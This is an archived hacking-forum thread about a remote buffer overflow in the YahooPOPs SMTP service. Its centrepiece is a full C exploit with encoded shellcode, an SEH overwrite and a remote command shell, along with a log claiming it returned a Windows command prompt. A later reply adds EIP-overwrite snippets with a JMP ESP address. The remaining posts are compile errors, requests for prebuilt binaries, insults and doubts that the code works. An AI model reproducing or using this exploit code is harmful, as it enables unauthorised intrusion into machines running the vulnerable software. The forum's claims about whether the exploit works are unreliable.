Example:
Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
504xA CODE
The EIP register will be overwritten and our code will be executed
here is a little exploit
Articles
Metasploit Framework Windows Tutorial The Archives General GSO | Full Version: Ypop Smtp Remote Buffer Overflow Exploit
The Bug is to send a request with more than 504 bytes that will overwrite ESP and cause a stack based overflow. Example: Telnet localhost 25 220 YahooPOPs! Simple Mail Transfer Service Ready 504xA CODE The EIP register will be overwritten and our code will be executed here is a little exploit
wow, thx agathos! will give it a try later!
havent seen much ypop servers though this exploit is nice
I have ONE Failure to compile this exploi with MS Visual Studio 6:
Iclude-data couldn`t open gnu/stubs.h, but when I insert the gnu/stubs.h the same failure appeared... what can I do ? please help me
i try to complie but so many erros:
Compiling... yahoo_cyrex.c CODE c:\program files\microsoft visual studio\vc98\include\unistd.h(42) : error C2146: syntax error : missing ')' before identifier 'owner' c:\program files\microsoft visual studio\vc98\include\unistd.h(42) : error C2081: 'uid_t' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\unistd.h(42) : error C2061: syntax error : identifier 'owner' c:\program files\microsoft visual studio\vc98\include\unistd.h(42) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(42) : error C2059: syntax error : ',' c:\program files\microsoft visual studio\vc98\include\unistd.h(42) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\unistd.h(52) : error C2061: syntax error : identifier 'fork' c:\program files\microsoft visual studio\vc98\include\unistd.h(52) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(52) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\unistd.h(54) : error C2061: syntax error : identifier 'getegid' c:\program files\microsoft visual studio\vc98\include\unistd.h(54) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(54) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\unistd.h(55) : error C2061: syntax error : identifier 'geteuid' c:\program files\microsoft visual studio\vc98\include\unistd.h(55) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(55) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\unistd.h(56) : error C2061: syntax error : identifier 'getgid' c:\program files\microsoft visual studio\vc98\include\unistd.h(56) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(56) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\unistd.h(58) : error C2061: syntax error : identifier 'getpid' c:\program files\microsoft visual studio\vc98\include\unistd.h(58) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(58) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\unistd.h(59) : error C2061: syntax error : identifier 'getuid' c:\program files\microsoft visual studio\vc98\include\unistd.h(59) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(59) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\unistd.h(64) : error C2146: syntax error : missing ')' before identifier 'group' c:\program files\microsoft visual studio\vc98\include\unistd.h(64) : error C2061: syntax error : identifier 'group' c:\program files\microsoft visual studio\vc98\include\unistd.h(64) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(64) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\unistd.h(65) : error C2146: syntax error : missing ')' before identifier 'user' c:\program files\microsoft visual studio\vc98\include\unistd.h(65) : error C2061: syntax error : identifier 'user' c:\program files\microsoft visual studio\vc98\include\unistd.h(65) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(65) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\unistd.h(73) : error C2146: syntax error : missing ')' before identifier 'owner' c:\program files\microsoft visual studio\vc98\include\unistd.h(73) : error C2081: 'uid_t' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\unistd.h(73) : error C2061: syntax error : identifier 'owner' c:\program files\microsoft visual studio\vc98\include\unistd.h(73) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(73) : error C2059: syntax error : ',' c:\program files\microsoft visual studio\vc98\include\unistd.h(73) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\unistd.h(77) : error C2146: syntax error : missing ')' before identifier 'group' c:\program files\microsoft visual studio\vc98\include\unistd.h(77) : error C2061: syntax error : identifier 'group' c:\program files\microsoft visual studio\vc98\include\unistd.h(77) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(77) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\unistd.h(78) : error C2146: syntax error : missing ')' before identifier 'user' c:\program files\microsoft visual studio\vc98\include\unistd.h(78) : error C2061: syntax error : identifier 'user' c:\program files\microsoft visual studio\vc98\include\unistd.h(78) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\unistd.h(78) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\io.h(267) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\io.h(270) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\io.h(276) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\process.h(222) : warning C4031: second formal parameter list longer than the first list c:\program files\microsoft visual studio\vc98\include\process.h(222) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\process.h(223) : warning C4031: second formal parameter list longer than the first list c:\program files\microsoft visual studio\vc98\include\process.h(223) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\process.h(224) : warning C4031: second formal parameter list longer than the first list c:\program files\microsoft visual studio\vc98\include\process.h(224) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\process.h(226) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\process.h(227) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\process.h(227) : warning C4028: formal parameter 3 different from declaration c:\program files\microsoft visual studio\vc98\include\process.h(228) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\direct.h(123) : warning C4028: formal parameter 2 different from declaration c:\program files\microsoft visual studio\vc98\include\win32.h(314) : error C2143: syntax error : missing ')' before '*' c:\program files\microsoft visual studio\vc98\include\win32.h(314) : error C2081: 'Stat_t' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\win32.h(314) : error C2143: syntax error : missing '{' before '*' c:\program files\microsoft visual studio\vc98\include\win32.h(314) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\win32.h(390) : error C2143: syntax error : missing ')' before '*' c:\program files\microsoft visual studio\vc98\include\win32.h(390) : error C2143: syntax error : missing '{' before '*' c:\program files\microsoft visual studio\vc98\include\win32.h(390) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\win32.h(410) : error C2061: syntax error : identifier 'Sighandler_t' c:\program files\microsoft visual studio\vc98\include\win32.h(411) : error C2059: syntax error : '}' c:\program files\microsoft visual studio\vc98\include\perlio.h(227) : error C2143: syntax error : missing ')' before 'const' c:\program files\microsoft visual studio\vc98\include\perlio.h(227) : error C2143: syntax error : missing '{' before 'const' c:\program files\microsoft visual studio\vc98\include\perlio.h(227) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\perlio.h(229) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\perlio.h(339) : error C2143: syntax error : missing ')' before '*' c:\program files\microsoft visual studio\vc98\include\perlio.h(339) : error C2081: 'SV' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\perlio.h(339) : error C2143: syntax error : missing '{' before '*' c:\program files\microsoft visual studio\vc98\include\perlio.h(339) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\perlio.h(339) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\perlio.h(342) : error C2143: syntax error : missing ')' before '*' c:\program files\microsoft visual studio\vc98\include\perlio.h(342) : error C2081: 'SV' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\perlio.h(342) : error C2143: syntax error : missing '{' before '*' c:\program files\microsoft visual studio\vc98\include\perlio.h(342) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\perlio.h(342) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\perlio.h(345) : error C2146: syntax error : missing ')' before identifier 'FILE' c:\program files\microsoft visual studio\vc98\include\perlio.h(345) : error C2059: syntax error : ',' c:\program files\microsoft visual studio\vc98\include\perlio.h(345) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\perlio.h(354) : error C2146: syntax error : missing ')' before identifier 'FILE' c:\program files\microsoft visual studio\vc98\include\perlio.h(354) : error C2085: 'f' : not in formal parameter list c:\program files\microsoft visual studio\vc98\include\perlio.h(354) : error C2059: syntax error : 'const' c:\program files\microsoft visual studio\vc98\include\perlio.h(355) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\perlio.h(358) : error C2146: syntax error : missing ')' before identifier 'FILE' c:\program files\microsoft visual studio\vc98\include\perlio.h(358) : error C2085: 'f' : not in formal parameter list c:\program files\microsoft visual studio\vc98\include\perlio.h(358) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\perlio.h(359) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\win32iop.h(65) : error C2061: syntax error : identifier 'win32_ftell' c:\program files\microsoft visual studio\vc98\include\win32iop.h(65) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\win32iop.h(65) : error C2059: syntax error : 'type' c:\program files\microsoft visual studio\vc98\include\win32iop.h(66) : error C2146: syntax error : missing ')' before identifier 'offset' c:\program files\microsoft visual studio\vc98\include\win32iop.h(66) : error C2081: 'Off_t' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\win32iop.h(66) : error C2061: syntax error : identifier 'offset' c:\program files\microsoft visual studio\vc98\include\win32iop.h(66) : error C2059: syntax error : ';' c:\program files\microsoft visual studio\vc98\include\win32iop.h(66) : error C2059: syntax error : ',' c:\program files\microsoft visual studio\vc98\include\win32iop.h(66) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\win32iop.h(73) : error C2143: syntax error : missing ')' before '*' c:\program files\microsoft visual studio\vc98\include\win32iop.h(73) : error C2081: 'Stat_t' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\win32iop.h(73) : error C2143: syntax error : missing '{' before '*' c:\program files\microsoft visual studio\vc98\include\win32iop.h(73) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\win32iop.h(73) : error C2086: 'sbufptr' : redefinition c:\program files\microsoft visual studio\vc98\include\win32iop.h(74) : error C2143: syntax error : missing ')' before '*' c:\program files\microsoft visual studio\vc98\include\win32iop.h(74) : error C2081: 'Stat_t' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\win32iop.h(74) : error C2143: syntax error : missing '{' before '*' c:\program files\microsoft visual studio\vc98\include\win32iop.h(74) : error C2059: syntax error : ')' c:\program files\microsoft visual studio\vc98\include\win32iop.h(74) : error C2086: 'sbufptr' : redefinition c:\program files\microsoft visual studio\vc98\include\win32iop.h(77) : error C2146: syntax error : missing ')' before identifier 'narg' c:\program files\microsoft visual studio\vc98\include\win32iop.h(77) : error C2081: 'IV' : name in formal parameter list illegal c:\program files\microsoft visual studio\vc98\include\win32iop.h(77) : fatal error C1003: error count exceeds 100; stopping compilation
oh pplz...you have to compile with linux btw. cygwin..
very nice cyrex 
thcit with cygwin pff but where i put all the includes files lib or the compilation with cygwin i have to lcc i wait someone compile thtat because it so...
My VC6 +sdk desnt want to compile that too bad
Ive also tried compiling this under linux and i error out.
here is a new version
 with connect back shell and universal win2k/XPCODE /*-= ---------------------------------- =- * = YPOP SMTP Remote Buffer Overflow = * = Universal Exploit by cyrex = *-= ---------------------------------- =- * = Usage: = * = ./ypop -h <hostname -t 0 = *-= ---------------------------------- =- LOG: [cyrex@elite (~/exploits/cyrex)]$ ./ex_ypop -h 192.168.1.3 -t 0 Super Universal Ypop remote buffer overflow exploit # remote host 192.168.1.3. # send exploit data. [*] data sent 861 bytes . [+] yes! Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\Program Files\YahooPOPs> */ #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <assert.h> #include <fcntl.h> #include <sys/time.h> #define SMTP_PORT 25 struct { int SEH_OFFSET; //Offset to SEH handler unsigned int offset; /* win200 seh offset */ unsigned int magic; /* magic address * windows 2000 use Jmp ebx * xp/2003 use __asm pop di * pop si * ret * * */ char *szDescription; }targets[] = { {647,0,0x1001f007, "Universal Windows XP/2003 offset - SEH overwrite"}, },v; unsigned char sc2[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85" "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A" "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A" "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC" "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58" "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12" "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71" "\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3" "\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66" "\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3" "\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66" "\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B" "\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99" "\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5" "\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71" "\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32" "\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6" "\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9" "\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA" "\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8" "\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC" "\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8" "\xFA\xFA\xFC\xE9\xED\x99"; int iType; int new_tcpConnect (char *host, unsigned int port, unsigned int timeout) { int sock, flag, pe = 0; size_t pe_len; struct timeval tv; struct sockaddr_in addr; struct hostent* hp = NULL; fd_set rset; // reslov hosts hp = gethostbyname (host); if (NULL == hp) { perror ("tcpConnect:gethostbyname\n"); return -1; } sock = socket (AF_INET, SOCK_STREAM, 0); if (-1 == sock) { perror ("tcpConnect:socket\n"); return -1; } addr.sin_addr = *(struct in_addr *) hp->h_addr; addr.sin_family = AF_INET; addr.sin_port = htons (port); /* set socket no block */ flag = fcntl (sock, F_GETFL); if (-1 == flag) { perror ("tcpConnect:fcntl\n"); close (sock); return -1; } flag |= O_NONBLOCK; if (fcntl (sock, F_SETFL, flag) < 0) { perror ("tcpConnect:fcntl\n"); close (sock); return -1; } if (connect (sock, (const struct sockaddr *) &addr, sizeof(addr)) < 0 && errno != EINPROGRESS) { perror ("tcpConnect:connect\n"); close (sock); return -1; } /* set connect timeout * use millisecond */ tv.tv_sec = timeout/1000; tv.tv_usec = timeout%1000; FD_ZERO (&rset); FD_SET (sock, &rset); if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) { // perror ("tcpConnect:select"); close (sock); return -1; } pe_len = sizeof (pe); if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) { perror ("tcpConnect:getsockopt\n"); close (sock); return -1; } if (pe != 0) { errno = pe; close (sock); return -1; } if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) { perror ("tcpConnect:fcntl\n"); close (sock); return -1; } pe = 1; pe_len = sizeof (pe); if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){ perror ("tcpConnect:setsockopt\n"); close (sock); return -1; } return sock; } /* rip code, from hsj */ int sh (int in, int out, int s) { char sbuf[128], rbuf[128]; int i, ti, fd_cnt, ret=0, slen=0, rlen=0; fd_set rd, wr; fd_cnt = in > out ? in : out; fd_cnt = s > fd_cnt ? s : fd_cnt; fd_cnt ++; for (;;) { FD_ZERO (&rd); if (rlen < sizeof (rbuf)) FD_SET (s, &rd); if (slen < sizeof (sbuf)) FD_SET (in, &rd); FD_ZERO (&wr); if (slen) FD_SET (s, &wr); if (rlen) FD_SET (out, &wr); if ((ti = select (fd_cnt, &rd, &wr, 0, 0)) == (-1)) break; if (FD_ISSET (in, &rd)) { if((i = read (in, (sbuf+slen), (sizeof (sbuf) - slen))) == (-1)) { ret = -2; break; } else if (i == 0) { ret = -3; break; } slen += i; if (!(--ti)) continue; } if (FD_ISSET (s, &wr)) { if ((i = write (s, sbuf, slen)) == (-1)) break; if (i == slen) slen = 0; else { slen -= i; memmove (sbuf, sbuf + i, slen); } if (!(--ti)) continue; } if (FD_ISSET (s, &rd)) { if ((i = read (s, (rbuf + rlen), (sizeof (rbuf) - rlen))) <= 0) break; rlen += i; if (!(--ti)) continue; } if (FD_ISSET (out, &wr)) { if ((i = write (out, rbuf, rlen)) == (-1)) break; if (i == rlen) rlen = 0; else { rlen -= i; memmove (rbuf, rbuf+i, rlen); } } } return ret; } int own_ypop(int sock,int iType) { char expbuf[2000]; int c,ret,i; int SEH_OFFSET = targets[iType].SEH_OFFSET; bzero (expbuf, sizeof (expbuf)); memset (expbuf,0x90,SEH_OFFSET); memcpy(expbuf+200,sc2,strlen(sc2)); *(unsigned int *)&expbuf[SEH_OFFSET-4] = 0x909006eb; *(unsigned int *)&expbuf[SEH_OFFSET] = targets[iType].magic; c = SEH_OFFSET + 4; memset (expbuf+c,0x90,10); c+=10; for(i=0;i<50;i++)*(unsigned int *)&expbuf[c+4*i] = 0x909008eb; c+=4*i; printf ("# send exploit data. \n"); sleep(3); ret = send (sock, expbuf, c, 0); printf ("[*] data sent %d bytes .\n", ret); close (sock); } int main (int argc, char **argv) { int c, sock, ret; char *hostName = NULL; if (argc < 3) { usage (argv[0]); return -1; } while((c = getopt(argc, argv, "h:t:")) != EOF) { switch© { case 'h': hostName = optarg; break; case 't': iType = atoi (optarg); break; default: usage (argv[0]); return 0; } } if (argc < 2) { usage(argv[0]); exit(1); } if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) ) { usage(argv[0]); printf("[-] Invalid type.\n"); return 0; } printf ("# remote host %s. \n", hostName); sock = new_tcpConnect (hostName, SMTP_PORT, 2000); sleep(1); own_ypop (sock,iType); sleep (2); if ((ret = new_tcpConnect (hostName, 1981, 2000)) < 0) { fprintf (stderr, "[-] failed :< \n"); goto out; } printf ("[+] yes! \n"); sh (0, 1, ret); out: close (ret); return 0; } int usage(char *p) { int i; printf( "Super Universal Ypop remote buffer overflow exploit\r\n"); printf( "Usage: %s <-h host> <-t type>\n" "[type]\n", p); for(i=0;i<sizeof(targets)/sizeof(v);i++) { printf("%d\t%s\n", i, targets[i].szDescription); } return 0; } void hexdump(char *addr, int len) { int i; for (i=0; i < len; i++) { fprintf(stderr, "%02x ", addr[i] & 0xFF); if (!(i % 16)) fprintf(stderr, "\n[%04X] ", i + 1); } }
always to compile this code with cygwin or VC 6 ???
use cygwin
even this one errors when compiling with cygwin. would be nice to test this one.
i donwloaded cygwin i typed that in my prompt
[fox@1337] gcc command not found. i have to dowload gcc ?? how to configure my path include && lib for a good compilation ?? with cygwin ( i downloaded the sdk too!!). i want to compile with cygwin !! i want   please!!
i know alot of people haveing erros but if someone does compile it ok can u post it, thx
thx alot for the code..looks intresting
I dunno if agathos tried tocompile it himself but just by reading the code , I suppose this is uncompilable and not working, you mix linux and windows codes.
101 , i coded it myself and tested it .. i compiled it under linux
if you cant compile it isnt my problem simple for is to use : gcc exploit -o exploit_binary <- under linux and it works under Win2003 Server and XP Sp1 & Sp2 your skills are not good sorry later ill try to compile it for you under win32 QUOTE(agathos @ Oct 1 2004, 08:22 PM) 101 , i coded it myself and tested it .. i compiled it under linux if you cant compile it isnt my problem simple for is to use : gcc exploit -o exploit_binary <- under linux and it works under Win2003 Server and XP Sp1 & Sp2 your skills are not good sorry later ill try to compile it for you under win32 hey dont think your are the only coder there dude , I know like you how to compile geez.. I have rightly noticed that your first code was a gay copy paste of mix windows/linux codes wich cant be compiled , which cant be used, the second one looks like better but I havent tried it. this to answer of all "I cant compile your code", replace the wrong code then... my skill isnt good ? then about you, code something decent instead of copy paste from every code that you can find and understand . haha. QUOTE(101 @ Oct 1 2004, 10:01 PM) QUOTE(agathos @ Oct 1 2004, 08:22 PM) 101 , i coded it myself and tested it .. i compiled it under linux if you cant compile it isnt my problem simple for is to use : gcc exploit -o exploit_binary <- under linux and it works under Win2003 Server and XP Sp1 & Sp2 your skills are not good sorry later ill try to compile it for you under win32 hey dont think your are the only coder there dude , I know like you how to compile geez.. I have rightly noticed that your first code was a gay copy paste of mix windows/linux codes wich cant be compiled , which cant be used, the second one looks like better but I havent tried it. this to answer of all "I cant compile your code", replace the wrong code then... my skill isnt good ? then about you, code something decent instead of copy paste from every code that you can find and understand . haha. lol
Why compile later, does it even work .lol Having my doubts.
Well tested this for the past 1/2 hr .. doesnt seem to work good:
CODE remote host ***.***.***.** # send exploit data. [*] data sent 861 bytes . [+] yes! Then goes back to a prompt [B]Or this happens[/B] # remote host ***.**.**.*** # send exploit data. [*] data sent 861 bytes . [+] yes! + 4.0.21-log [☺ Pe.P)|Uu ,☻
well then it can be that exploit doesnt work on windows properly , may you can try
to use it under linux im sure it works there
Just to notice some other points that let me think u post it only for your "name" instead of to code exactly what is the buffer overflow there.
Im not an expert myself but at least I try to understand whats happen. Your second exploit , I tried it , this CANT work , why ? First of all its locked on the port 25, hu... why? Then it says it sended 861 bytes of datas, but 861 bytes thats already too many, and it will crash yahoopops before that u are able to jump to your payload. Then , you claim that you use a "Super Universal" offset, the original JMP ESP from libcurl.dll is already universal because it comes with the yahoopops application. Your exploit cant work because it is not able to jump to the payload at the register EIP wich is the most important, when you overwrite EIP with a correct jump , your are able to redirect the processus to your bad code. Your exploit there totally overwrite the register EIP with a wrong address and cant jump to it, then crash. For your help EIP starts at byte 504 and stops at 507. in a code language you can test to debug this to see EIP overwritten. CODE plen=503; memset(overflow,0,sizeof(overflow)); for (i=0; i<plen;i++){strcat(overflow,"A");} strcat(overflow,"BBBB"); this will overwrite EIP of 0x42424242 hex value of "BBBB" wich is a wrong value and crash. or CODE char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll plen=503; memset(overflow,0,sizeof(overflow)); for (i=0; i<plen;i++){strcat(overflow,"A");} strcat(overflow,ret_code); strcat(overflow,"\xcc"); this will overwrite EIP of the ret_code and instead of to crash , the debugger will hang on INT3 wich is "\xcc" the breakpoints were you jump. sorry to say you actually your exploit cant work, maybe you'll fix it anyway you try thats it, Im also trying to get it to execute what i want but thats not an easy step. later.
man, before you say anything to me learn to code ASM
the exploit use SEH overwrite method and no JMP EIP or anything else BYE NOOB noob ? hey hm I think here you are the only one windows/linux codes dj lol ... and you copy pasted that SEH method from where again ? lollll Because looks like you are the only one to make your crap code working so we should be all noob and only you the leet. Nm anyway I successfully noticed that you wasnt able to understand or to explain what you coded, enough to say thats a crap exploit.
anybody got a compiled version?
FLX This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc. |
||||
